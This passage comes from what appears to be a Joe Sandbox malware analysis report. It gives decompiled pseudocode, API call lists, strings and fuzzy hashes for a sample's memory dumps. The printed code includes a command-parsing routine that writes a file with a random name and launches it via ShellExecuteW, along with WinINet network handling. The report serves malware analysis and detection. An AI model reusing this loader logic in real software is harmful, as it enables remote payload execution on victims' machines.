				_t264 =  *((intOrPtr*)( *0x40e000))(_t110, _a4,  *0x40e300);
				_v68 = _t264;
				_t113 = E0040A69E( *0x40e000,  &_v36);
				_t209 = _v36;
				if(_t113 == 0) {
					L48:
					LocalFree(_t264);
					DeleteFileW(_t209);
					LocalFree(_t209);
					L49:
					goto L50;
				}
				_push(0);
				_push(_t209);
				_push(_t264);
				if( *((intOrPtr*)( *0x40e184))() == 0) {
					goto L48;
				}
				_t119 =  *((intOrPtr*)( *0x40e03c))(_t209, 0x80000000, 1, 0, 3, 0, 0);
				_v72 = _t119;
				_t270 =  *((intOrPtr*)( *0x40e14c))(_t119, 0);
				_t121 =  *((intOrPtr*)( *0x40e044))(0x40, _t270);
				_push(0);
				_push( &_v76);
				_t18 = _t270 - 1; // -1
				_v44 = _t121;
				_push(_t121);
				_push(_v72);
				if( *((intOrPtr*)( *0x40e088))() == 0) {
					L43:
					LocalFree(_v44);
					CloseHandle(_v72);
					DeleteFileW(_t209);
					if(_t264 != 0) {
						LocalFree(_t264);
					}
					if(_t209 != 0) {
						LocalFree(_t209);
					}
					return 1;
				}
				_t271 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _a4, 0xffffffff, 0, 0, 0, 0);
				_t22 = _t271 + 0x40; // 0x40
				_t132 =  *((intOrPtr*)( *0x40e044))(0x40, _t22);
				_v40 = _t132;
				if(_t271 == 0) {
					L7:
					_push(_v40);
					_t133 =  *0x40e490; // 0x6d80a7f0
					if( *_t133() != 0) {
						L42:
						 *0x40e4a8();
						LocalFree(_v40);
						goto L43;
					}
					_t228 = _v44;
					_t265 = _t228;
					_push(_t228);
					_v32 = _t265;
					_t273 = 1;
					if( *((intOrPtr*)( *0x40e198))() <= 0x200) {
						L41:
						_t264 = _v68;
						goto L42;
					}
					while(_t273 != 0) {
						_v60 = _v60 & 0x00000000;
						_t140 =  *((intOrPtr*)( *0x40e00c))(_t265, _v48);
						_v20 = _v20 | 0xffffffff;
						_t210 = _t140;
						_v16 = _v16 | 0xffffffff;
						if(_t210 == 0) {
							break;
						}
						_t211 = _t210 - _t265;
						if(_t210 - _t265 < 0) {
							break;
						}
						_t142 =  *((intOrPtr*)( *0x40e00c))(_t265, _v80);
						if(_t142 == 0) {
							_t273 = 0;
						} else {
							_v20 = _t142 - _t265;
						}
						_v8 = _t273;
						_t144 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_a8 = _t144;
						_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_v24 = _t146;
						_t147 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
						_push(_v20);
						_v28 = _t147;
						if(E0040A457(_t265,  &_a8,  *((intOrPtr*)( *0x40e198))() + _t211, _v48) == 0) {
							L38:
							LocalFree(_a8);
							LocalFree(_v24);
							LocalFree(_v28);
							_t212 = _v16;
							if(_t212 < 0) {
								break;
							}
							_t265 = _t265 +  *((intOrPtr*)( *0x40e198))(_v64) + _t212;
							_push(_t265);
							_v32 = _t265;
							if( *((intOrPtr*)( *0x40e198))() > 0x200) {
								continue;
							}
							break;
						} else {
							_t160 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000);
							_v12 = _t160;
							_t163 = MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, 0, 0);
							_v20 = _t163;
							if(_t163 != 0) {
								_t267 = _t163 + _t163;
								_t196 =  *((intOrPtr*)( *0x40e044))(0x40, _t267);
								_t216 = _t196;
								MultiByteToWideChar(0xfde9, 0, _a8,  *((intOrPtr*)( *0x40e198))(_a8) + 1, _t216, _v20);
								 *((short*)(_t267 + _t216 - 2)) = 0;
								_v12 =  *((intOrPtr*)( *0x40e13c))(_v12, _t216);
								LocalFree(_t216);
								_t265 = _v32;
								_v60 = 1;
							}
							_t165 =  *((intOrPtr*)( *0x40e00c))(_t265, _v52);
							if(_t165 == 0) {
								L36:
								_t273 = 0;
								L37:
								LocalFree(_v12);
								goto L38;
							}
							_t273 = _v8;
							_t167 = _t165 - _t265;
							_v20 = _t167;
							if(_t167 < 0) {
								goto L37;
							}
							_t213 =  *((intOrPtr*)( *0x40e00c))(_t265, _v56);
							if(_t213 == 0) {
								goto L36;
							}
							_t214 = _t213 - _t265;
							if(_t214 >= 0) {
								_push(_t214);
								if(E0040A457(_t265,  &_v24,  *((intOrPtr*)( *0x40e198))() + _v20, _v52) != 0) {
									_v20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
									E00406468(_v24,  &_v20);
									_t240 =  *((intOrPtr*)( *0x40e00c))(_t265, _v64);
									if(_t240 == 0) {
										_t273 = 0;
									} else {
										_t241 = _t240 - _t265;
										_v92 = _t241;
										_v16 = _t241;
										if(_t241 >= 0) {
											_push(_t241);
											_v16 = _t241;
											if(E0040A457(_t265,  &_v28,  *((intOrPtr*)( *0x40e198))() + _t214, _v56) != 0) {
												_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x3f40);
												if(E00406468(_v28,  &_v16) != 0 && _v60 != 0) {
													_t190 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
													_t215 = _t190;
													_t191 =  *((intOrPtr*)( *0x40e0ec))(_t215,  *0x40e1a4, _v12, _v20, _v16);
													_t278 = _t278 + 0x14;
													if(_t191 >= lstrlenW( *0x40e1a4)) {
														_t276 = _v84;
														 *_t276 = E0040A503( *_t276, _t215);
													}
													if(_t215 != 0) {
														LocalFree(_t215);
													}
													_t265 = _v32;
													 *_v88 =  *_v88 + 1;
												}
												LocalFree(_v16);
												_t273 = _v8;
												_v16 = _v92;
											}
										}
									}
									LocalFree(_v20);
								}
							}
							goto L37;
						}
					}
					_t209 = _v36;
					goto L41;
				}
				_push(0);
				_push(0);
				_push(_t271);
				_push(_t132);
				_push(0xffffffff);
				_push(_a4);
				_push(0);
				_push(0xfde9);
				if( *((intOrPtr*)( *0x40e0e4))() != 0) {
					goto L7;
				} else {
					LocalFree(_v44);
					LocalFree(_t264);
					LocalFree(_t209);
					LocalFree(_v40);
					goto L49;
				}
			}

0x00406d33
0x00406d36
0x00406d39
0x0040720c
0x00000000
0x0040720c
0x00406d3f
0x00406d49
0x00406d4d
0x00406d50
0x00406d55
0x00406d58
0x00406d5d
0x00406d60
0x00406d65
0x00406d68
0x00406d6e
0x00406d78
0x00406d85
0x00406d96
0x00406d9c
0x00406da1
0x00406da4
0x00406da9
0x00406dae
0x004071f7
0x004071f8
0x004071ff
0x00407206
0x00407206
0x00000000
0x00407206
0x00406dbc
0x00406dbd
0x00406dbe
0x00406dc3
0x00000000
0x00000000
0x00406ddb
0x00406de5
0x00406df0
0x00406df5
0x00406e00
0x00406e02
0x00406e03
0x00406e06
0x00406e0a
0x00406e0b
0x00406e12
0x004071c3
0x004071c6
0x004071cf
0x004071d6
0x004071de
0x004071e1
0x004071e1
0x004071e9
0x004071ec
0x004071ec
0x00000000
0x004071f4
0x00406e36
0x00406e38
0x00406e3e
0x00406e40
0x00406e45
0x00406e83
0x00406e83
0x00406e86
0x00406e90
0x004071b4
0x004071b4
0x004071bd
0x00000000
0x004071bd
0x00406e96
0x00406ea0
0x00406ea2
0x00406ea3
0x00406ea6
0x00406eae
0x004071b1
0x004071b1
0x00000000
0x004071b1
0x00406eb4
0x00406ec4
0x00406ec9
0x00406ecb
0x00406ecf
0x00406ed1
0x00406ed7
0x00000000
0x00000000
0x00406edd
0x00406edf
0x00000000
0x00000000
0x00406eee
0x00406ef2
0x00406efb
0x00406ef4
0x00406ef6
0x00406ef6
0x00406f09
0x00406f0c
0x00406f13
0x00406f1d
0x00406f2c
0x00406f2f
0x00406f31
0x00406f3d
0x00406f53
0x00407168
0x0040716b
0x00407174
0x0040717d
0x00407183
0x00407188
0x00000000
0x00000000
0x00407196
0x0040719d
0x0040719e
0x004071a8
0x00000000
0x00000000
0x00000000
0x00406f59
0x00406f65
0x00406f76
0x00406f8b
0x00406f8d
0x00406f92
0x00406f9a
0x00406fa0
0x00406fab
0x00406fc5
0x00406fcd
0x00406fda
0x00406fdd
0x00406fe3
0x00406fe6
0x00406fe6
0x00406ff6
0x00406ffa
0x0040715d
0x0040715d
0x0040715f
0x00407162
0x00000000
0x00407162
0x00407000
0x00407003
0x00407005
0x00407008
0x00000000
0x00000000
0x00407019
0x0040701d
0x00000000
0x00000000
0x00407023
0x00407027
0x00407032
0x0040704a
0x00407064
0x00407067
0x00407077
0x0040707b
0x00407150
0x00407081
0x00407081
0x00407085
0x00407088
0x0040708b
0x00407096
0x0040709a
0x004070b0
0x004070ca
0x004070d4
0x004070e8
0x004070f3
0x00407108
0x0040710a
0x00407119
0x0040711b
0x00407127
0x00407127
0x0040712b
0x0040712e
0x0040712e
0x00407137
0x0040713a
0x0040713a
0x0040713f
0x00407148
0x0040714b
0x0040714b
0x004070b0
0x0040708b
0x00407155
0x00407155
0x0040704a
0x00000000
0x00407027
0x00406f53
0x004071ae
0x00000000
0x004071ae
0x00406e4f
0x00406e50
0x00406e51
0x00406e52
0x00406e53
0x00406e55
0x00406e58
0x00406e59
0x00406e62
0x00000000
0x00406e64
0x00406e67
0x00406e6e
0x00406e75
0x00407206
0x00000000
0x00407206

APIs

Part of subcall function 0040A69E: LocalFree.KERNEL32(00000000,?,?,0040B2D2), ref: 0040A701

LocalFree.KERNEL32(?), ref: 00406E67
LocalFree.KERNEL32(00000000), ref: 00406E6E
LocalFree.KERNEL32(?), ref: 00406E75
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,00000000), ref: 00406F8B
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,000000FF,00000001,00000000,000000FF), ref: 00406FC5
LocalFree.KERNEL32(00000000), ref: 00406FDD
LocalFree.KERNEL32(?), ref: 004071C6
CloseHandle.KERNEL32(?), ref: 004071CF
DeleteFileW.KERNEL32(?), ref: 004071D6
LocalFree.KERNEL32(00000000), ref: 004071E1
LocalFree.KERNEL32(?), ref: 004071EC
LocalFree.KERNEL32(00000000), ref: 004071F8
DeleteFileW.KERNEL32(?), ref: 004071FF
LocalFree.KERNEL32(?), ref: 00407206

Strings

PTa, xrefs: 00406D50
pUa, xrefs: 00406D3F
0Sa, xrefs: 00406D68
zh@, xrefs: 00407171, 0040703B, 0040705E

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$ByteCharDeleteFileMultiWide$CloseHandle
String ID: 0Sa$PTa$pUa$zh@
API String ID: 490209112-3483291443
Opcode ID: aed315620f2e5375fbeaccad3c1e2c1dcebad95f7306f182bde096d8017c1574
Instruction ID: f5ae4f6584a7baff5169ccf4eff2fbd10138ea77d31ce010a22c6c2769712165
Opcode Fuzzy Hash: aed315620f2e5375fbeaccad3c1e2c1dcebad95f7306f182bde096d8017c1574
Instruction Fuzzy Hash: D6E18471A00215AFEB04DFA6DD85EAEBBB5EF48310F004439FA15B7390DBB46911CB69

Uniqueness

Uniqueness Score: -1.00%

Function 02088142 Relevance: 46.0, APIs: 22, Strings: 4, Instructions: 477networkfileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,?,?,?,?,0208297C,00000000,00000000,00000000), ref: 020882B4
LocalFree.KERNEL32(?,?,?,?,?,?,0208297C,00000000,00000000,00000000), ref: 0208833D
LocalFree.KERNEL32(00000000,?,?,?,?,?,0208297C,00000000,00000000,00000000), ref: 02088344
LocalFree.KERNEL32(00000000,?,?,?,?,?,0208297C,00000000,00000000,00000000), ref: 0208834B
LocalFree.KERNEL32(00000000,?,?,?,?,?,0208297C,00000000,00000000,00000000), ref: 02088354
LocalFree.KERNEL32(?,?,?,?,?,?,0208297C,00000000,00000000,00000000), ref: 02088389
LocalFree.KERNEL32(00000000,?,?,?,?,?,0208297C,00000000,00000000,00000000), ref: 02088390
CloseHandle.KERNEL32(-00000004,?,?,?,?,?,0208297C,00000000,00000000), ref: 02088497
LocalFree.KERNEL32(?,?,?,?,?,?,0208297C,00000000,00000000), ref: 020884A6
DeleteFileW.KERNEL32(?,?,?,?,?,?,0208297C,00000000,00000000), ref: 020884B5
LocalFree.KERNEL32(?,?,?,?,?,?,0208297C,00000000,00000000), ref: 020884BE
LocalFree.KERNEL32(0000002F,?,?,?,?,?,0208297C,00000000,00000000), ref: 020884C7
LocalFree.KERNEL32(00000000,?,?,?,?,?,0208297C,00000000,00000000), ref: 02088548
InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 02088579
InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 02088588
InternetCloseHandle.WININET(?), ref: 02088654
InternetCloseHandle.WININET(00000000), ref: 02088660
InternetCloseHandle.WININET(00000000), ref: 02088667
LocalFree.KERNEL32(00000000,?,?,?,?,?,0208297C,00000000,00000000), ref: 020886D5
LocalFree.KERNEL32(00000000,?,?,?,?,?,0208297C,00000000,00000000), ref: 020886DE
LocalFree.KERNEL32(00000000,?,?,?,?,?,0208297C,00000000,00000000), ref: 020886E5
LocalFree.KERNEL32(00000001,?,?,?,?,?,0208297C,00000000,00000000), ref: 020886EE

Strings

Xaa, xrefs: 02088244
`Y_, xrefs: 0208821F
/, xrefs: 020881B8
@Y_, xrefs: 02088237, 02088266, 02088280, 0208828D, 020882A4

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$Internet$CloseHandle$Option$DeleteFile
String ID: /$@Y_$Xaa$`Y_
API String ID: 3877996606-1127813696
Opcode ID: 44b8c5c6b5931157c93208281ed44bf5aaa786017533818b3ea69a1034d7864d
Instruction ID: 9952b72715fa1f1a5d091ebc1d6711a1c91e6d31e532538cd14c427f8c1a919d
Opcode Fuzzy Hash: 44b8c5c6b5931157c93208281ed44bf5aaa786017533818b3ea69a1034d7864d
Instruction Fuzzy Hash: E702B275A00215AFDF04EFB5DE58EAF77B6EB48300F008829E951B7290DB74AD11DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004073C7 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 315
memoryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E004073C7() {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t65;
				void* _t72;
				void* _t79;
				void* _t86;
				void* _t97;
				void* _t108;
				void* _t122;
				void* _t123;
				char _t128;
				void* _t137;
				void* _t139;
				void* _t140;
				void* _t142;
				void* _t144;
				void* _t183;
				intOrPtr _t188;
				void* _t189;
				void* _t190;
				void* _t192;
				void* _t194;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				signed int _t205;
				void* _t207;
				signed int _t209;
				void* _t211;
				signed int _t213;
				void* _t215;
				signed int _t217;
				char _t218;
				void* _t219;
				void* _t222;
				void* _t223;

				_t190 =  *((intOrPtr*)( *0x40e18c))(_t144,  *0x40e3a0, _t189);
				if(_t190 == 0) {
					L41:
					return 0;
				} else {
					while(1) {
						_t192 = _t190 + 8;
						_t65 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t192) + _t63);
						_t137 = _t65;
						_v20 = _t137;
						_t202 =  *((intOrPtr*)( *0x40e18c))(_t192,  *0x40e1f0);
						if(_t202 == 0) {
							break;
						}
						_t205 = _t202 - _t192 >> 1;
						if(E0040A3E4(_t192,  &_v20, 0, _t205) == 0) {
							_t137 = _v20;
							break;
						}
						_t194 = _t192 + _t205 * 2 + 2;
						_t72 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t194) + _t70);
						_t139 = _t72;
						_v12 = _t139;
						_t207 =  *((intOrPtr*)( *0x40e18c))(_t194,  *0x40e20c);
						if(_t207 == 0) {
							L36:
							LocalFree(_t139);
							L34:
							LocalFree(_v20);
							L39:
							L40:
							goto L41;
						}
						_t209 = _t207 - _t194 >> 1;
						if(E0040A3E4(_t194,  &_v12, 0, _t209) == 0) {
							_t139 = _v12;
							goto L36;
						}
						_t196 = _t194 + _t209 * 2 + 2;
						_t79 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t196) + _t77);
						_t140 = _t79;
						_v8 = _t140;
						_t211 =  *((intOrPtr*)( *0x40e18c))(_t196,  *0x40e20c);
						if(_t211 == 0) {
							L33:
							LocalFree(_t140);
							LocalFree(_v12);
							goto L34;
						}
						_t213 = _t211 - _t196 >> 1;
						if(E0040A3E4(_t196,  &_v8, 0, _t213) == 0) {
							_t140 = _v8;
							goto L33;
						}
						_t198 = _t196 + _t213 * 2 + 2;
						_t86 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t198) + _t84);
						_t137 = _t86;
						_v16 = _t137;
						_t215 =  *((intOrPtr*)( *0x40e18c))(_t198,  *0x40e228);
						if(_t215 == 0) {
							L31:
							LocalFree(_v12);
							LocalFree(_v20);
							L29:
							break;
						}
						_t217 = _t215 - _t198 >> 1;
						if(E0040A3E4(_t198,  &_v16, 0, _t217) == 0) {
							_t137 = _v16;
							goto L31;
						}
						_t15 = _t217 + 1; // 0x1
						_t199 = _v20;
						_v32 = _t198 + _t15 * 2;
						_push(_t199);
						if( *((intOrPtr*)( *0x40e074))() != 1) {
							_push(_t199);
							if( *((intOrPtr*)( *0x40e074))() != 2) {
								_push(_t199);
								if( *((intOrPtr*)( *0x40e074))() == 3) {
									ShellExecuteW(0, L"open", _v16, _v12, 0, 0);
								}
							}
							L24:
							_t97 = _v8;
							L25:
							LocalFree(_t97);
							LocalFree(_v12);
							LocalFree(_t199);
							LocalFree(_v16);
							_t190 =  *((intOrPtr*)( *0x40e18c))(_v32,  *0x40e3a0);
							if(_t190 != 0) {
								continue;
							}
							goto L40;
						}
						_t97 = _v8;
						if( *_t97 != 0x25) {
							goto L25;
						}
						_t21 = _t97 + 2; // 0x407c02
						_t218 = _t21;
						_v24 = _t218;
						_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
						_t137 = _t108;
						_v20 = _t137;
						_t219 =  *((intOrPtr*)( *0x40e18c))(_t218,  *0x40e364);
						if(_t219 == 0) {
							L28:
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_t199);
							LocalFree(_v16);
							goto L29;
						}
						_t221 = _t219 - _v24 >> 1;
						if(E0040A3E4(_v24,  &_v20, 0, _t219 - _v24 >> 1) == 0) {
							_t137 = _v20;
							goto L28;
						}
						_t142 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
						_push(0x208);
						_push(_t142);
						_push(_v20);
						if( *((intOrPtr*)( *0x40e15c))() != 0) {
							_t222 = E0040A503(_t142, _v24 + 2 + _t221 * 2);
							_t122 =  *((intOrPtr*)( *0x40e044))(0x40, 0x209);
							_t183 = 8;
							_t123 = E0040A05F(_t122, _t183);
							_t143 = _t123;
							_push(_t222);
							_v28 = _t123;
							if( *((short*)(_t222 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x5c) {
								_t188 =  *0x40e258; // 0x5f5740
								_t222 = E0040A503(_t222, _t188);
							}
							_t142 = E0040A503(E0040A503(E0040A503(_t222, _t143), "."), _v16);
							_t128 =  *0x40e374; // 0x60e1f0
							_v24 = _t128;
							_t223 = E00408619( &_v24);
							if(E00408495(_v12, _t223, _t142) != 0) {
								ShellExecuteW(0, 0, _t142, 0, 0, 0);
							}
							LocalFree(_v28);
							LocalFree(_t223);
						}
						LocalFree(_t142);
						LocalFree(_v20);
						goto L24;
					}
					LocalFree(_t137);
					goto L39;
				}
			}

0x004073dc
0x004073e0
0x0040776a
0x0040776e
0x004073e6
0x004073e8
0x004073ed
0x004073fe
0x0040740c
0x0040740f
0x00407414
0x00407418
0x00000000
0x00000000
0x00407423
0x00407433
0x0040775e
0x00000000
0x0040775e
0x00407447
0x00407452
0x00407460
0x00407463
0x00407468
0x0040746c
0x0040775b
0x0040774d
0x0040774d
0x00407762
0x00407762
0x00407768
0x00000000
0x00407769
0x00407477
0x00407487
0x00407758
0x00000000
0x00407758
0x0040749b
0x004074a6
0x004074b4
0x004074b7
0x004074bc
0x004074c0
0x00407743
0x00407744
0x0040774d
0x00000000
0x0040774d
0x004074cb
0x004074db
0x00407740
0x00000000
0x00407740
0x004074ef
0x004074fa
0x00407508
0x0040750b
0x00407510
0x00407514
0x00407732
0x00407735
0x00407727
0x00407727
0x00000000
0x00407727
0x0040751f
0x00407530
0x0040772f
0x00000000
0x0040772f
0x00407536
0x0040753c
0x0040753f
0x00407547
0x0040754d
0x004076a0
0x004076a6
0x004076ad
0x004076b3
0x004076c3
0x004076c3
0x004076b3
0x004076c9
0x004076c9
0x004076cc
0x004076cd
0x004076d6
0x004076dd
0x004076e6
0x004076fc
0x00407700
0x00000000
0x00000000
0x00000000
0x00407706
0x00407553
0x0040755a
0x00000000
0x00000000
0x00407560
0x00407560
0x0040756f
0x00407572
0x00407580
0x00407583
0x00407588
0x0040758c
0x0040770b
0x0040770e
0x00407717
0x0040771e
0x00407727
0x00000000
0x00407727
0x0040759b
0x004075a9
0x00407708
0x00000000
0x00407708
0x004075c3
0x004075c5
0x004075ca
0x004075cb
0x004075d2
0x004075ee
0x004075f7
0x004075fb
0x004075fe
0x00407609
0x0040760b
0x0040760c
0x00407617
0x00407619
0x00407626
0x00407626
0x00407647
0x0040764c
0x00407651
0x0040765c
0x00407669
0x00407673
0x00407673
0x0040767c
0x00407683
0x00407683
0x0040768a
0x00407693
0x00000000
0x00407693
0x00407762
0x00000000
0x00407762

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004073FE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407762

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 00407452
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074A6
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074FA
ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407673
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040767C
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407683
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040768A
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407693

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 004076C3
LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 004076CD
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076D6
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076DD
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076E6
LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 0040770E
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407717
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040771E
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407727
LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407735
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407744
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040774D

Strings

@W_, xrefs: 00407619
open, xrefs: 004076BD

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$ExecuteShelllstrlen$Global
String ID: @W_$open
API String ID: 4025529775-3865093603
Opcode ID: 3fa912a78e7310048800c045cae126a341e84520426cb39a8ff5d103cddae2bc
Instruction ID: c37f464f11a496ac5bed0fa78998882daeccb467a6fdaf8c4272b4e6ddd95f6a
Opcode Fuzzy Hash: 3fa912a78e7310048800c045cae126a341e84520426cb39a8ff5d103cddae2bc
Instruction Fuzzy Hash: 54A1FA72E00215AFDB149BA6DE84D7E7BB5EB44310B004835E905F73A1DB78BD11CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 02086F8D Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 419fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0208A905: LocalFree.KERNEL32(00000000,?,?,02082C15), ref: 0208A968

LocalFree.KERNEL32(?), ref: 020870CE
LocalFree.KERNEL32(00000000), ref: 020870D5
LocalFree.KERNEL32(?), ref: 020870DC
LocalFree.KERNEL32(00000000), ref: 02087244
LocalFree.KERNEL32(?), ref: 0208742D
CloseHandle.KERNEL32(?), ref: 02087436
DeleteFileW.KERNEL32(?), ref: 0208743D
LocalFree.KERNEL32(00000000), ref: 02087448
LocalFree.KERNEL32(?), ref: 02087453
LocalFree.KERNEL32(00000000), ref: 0208745F
DeleteFileW.KERNEL32(?), ref: 02087466
LocalFree.KERNEL32(?), ref: 0208746D

Strings

PTa, xrefs: 02086FB7
0Sa, xrefs: 02086FCF
pUa, xrefs: 02086FA6

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile$CloseHandle
String ID: 0Sa$PTa$pUa
API String ID: 3365615635-2980735933
Opcode ID: 6b69802a48eb8782515909e086c02e5c0d34241564e5da442a695b2d7f20041d
Instruction ID: 61635ba928f986103da419585e733dc58a405a1fd61c15179375914fc19c8e71
Opcode Fuzzy Hash: 6b69802a48eb8782515909e086c02e5c0d34241564e5da442a695b2d7f20041d
Instruction Fuzzy Hash: 7CE1A375A00215AFEB05EFA6DD84EAEBBB5FF48310F104429FA14F7260DBB49910DB64

Uniqueness

Uniqueness Score: -1.00%

Function 02085DC2 Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 372COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 02085E53

Strings

@W_, xrefs: 02085F16
X_, xrefs: 02085FE0
*.lnk, xrefs: 02085F47
., xrefs: 02085E71

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID: *.lnk$.$@W_$X_
API String ID: 2826327444-2708863609
Opcode ID: 3150c680f21ee6bfbfefdc720a97a6de524c9d957b265806f1dde896eba8a9dd
Instruction ID: c5915d2ea267df4d474bafed577a4dc68179c57622625b6ccceb44c621b388a2
Opcode Fuzzy Hash: 3150c680f21ee6bfbfefdc720a97a6de524c9d957b265806f1dde896eba8a9dd
Instruction Fuzzy Hash: 4ED1BA71A00319ABDF05EFA5DD84BAF7BB6EB48300F014524EA14B72A0DB71A951DF68

Uniqueness

Uniqueness Score: -1.00%

Function 0208349D Relevance: 37.2, APIs: 20, Strings: 1, Instructions: 437fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000), ref: 0208352A

Part of subcall function 0208A905: LocalFree.KERNEL32(00000000,?,?,02082C15), ref: 0208A968

LocalFree.KERNEL32(00000000), ref: 02083579
LocalFree.KERNEL32(00000000), ref: 02083588
LocalFree.KERNEL32(00000000), ref: 02083597
LocalFree.KERNEL32(00000000), ref: 020835A2
LocalFree.KERNEL32(00000000), ref: 020835AD
LocalFree.KERNEL32(00000000), ref: 020836D2
LocalFree.KERNEL32(?), ref: 020836D9
LocalFree.KERNEL32(00000000), ref: 02083705
LocalFree.KERNEL32(?), ref: 0208370C
LocalFree.KERNEL32(00000000), ref: 020839AE
DeleteFileW.KERNEL32(?), ref: 020839B5
LocalFree.KERNEL32(?), ref: 020839BC

Strings

P`, xrefs: 02083826

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID: P`
API String ID: 2194112602-2734055736
Opcode ID: 743d3936997c352c872d7cf10618c75b7b5c1b542be5bb5ea46889d68cad6593
